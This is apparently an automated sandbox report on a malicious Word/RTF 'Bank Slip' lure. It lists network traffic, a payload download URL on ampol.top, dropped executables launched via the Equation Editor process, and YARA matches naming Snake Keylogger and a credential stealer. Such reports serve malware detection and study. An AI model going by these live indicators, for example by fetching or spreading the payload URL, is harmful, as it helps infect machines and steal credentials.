            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: ampol.top
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: obie8920193.exe, 00000007.00000002.864677424.00000000022C5000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023A0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: obie8920193.exe, 00000007.00000002.865491806.0000000005884000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: obie8920193.exe, 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.865491806.0000000005870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.865491806.0000000005870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022EC000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: obie8920193.exe, 00000005.00000002.366421408.0000000002571000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://www.opcom.ro/rapoarte/export_csv_raportPIPsiVolumTranzactionat_PI.php?zi=
            Source: obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: http://www.opcom.ro/rapoarte/export_xml_PIPsiVolTranPI.php?zi=
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ampol.top/
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ampol.top/FcdBUj68lnCbMtB.exe
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ampol.top/FcdBUj68lnCbMtB.exej
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ampol.top/FcdBUj68lnCbMtB.exettC:
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: obie8920193.exe, 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
            Source: EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: EQNEDT32.EXE, 00000002.00000002.354913231.0000000004379000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
            Source: unknownHTTPS traffic detected: 104.21.53.203:443 -> 192.168.2.22:49163 version: TLS 1.2

            System Summary

            Source: Bank Slip 2.doc, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR | Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\obie8920193.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exe
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Process Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_001C1C58
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_002605E0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_0026F0C8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_002612C9
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_0026E370
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_0026E7A8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_0026E798
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_0026FA60
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_0026FA70
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 5_2_0026EC90
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C5038
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C3055
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C3891
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C78C1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C4130
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C2910
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003CD1D8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C8A19
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C5B18
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C3B72
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C2BF1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C844A
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C35B0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C3E50
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003CC750
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C6740
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C7000
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C6BA0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003C7460
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003CC740
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003CBFBA
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_003CBFC8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00575E58
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057F460
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057EE10
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057D4E0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057E178
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057DB30
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057E7C0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00579459
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00574448
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057AA48
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00571471
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00579468
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00577A10
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00571018
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00575A00
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057443E
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00572A38
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057AA38
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00571028
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057C028
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00572A28
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_005732D9
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_005718D8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057C8D8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_005718C9
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00576CC8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00574CF8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00574CEA
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_005732E8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_005798E8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00572E90
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00574890
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057AE90
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00577698
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00572E81
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00571480
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057C480
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00576CBC
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_005748A0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_0057AEA0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code function: 7_2_00575150
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005737407_2_00573740
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00579D407_2_00579D40
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005751407_2_00575140
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005707787_2_00570778
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057B7787_2_0057B778
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005721787_2_00572178
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057B7677_2_0057B767
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005707687_2_00570768
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057B3117_2_0057B311
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005703107_2_00570310
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005787087_2_00578708
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005737327_2_00573732
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00571D307_2_00571D30
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005703207_2_00570320
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057B3207_2_0057B320
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00571D207_2_00571D20
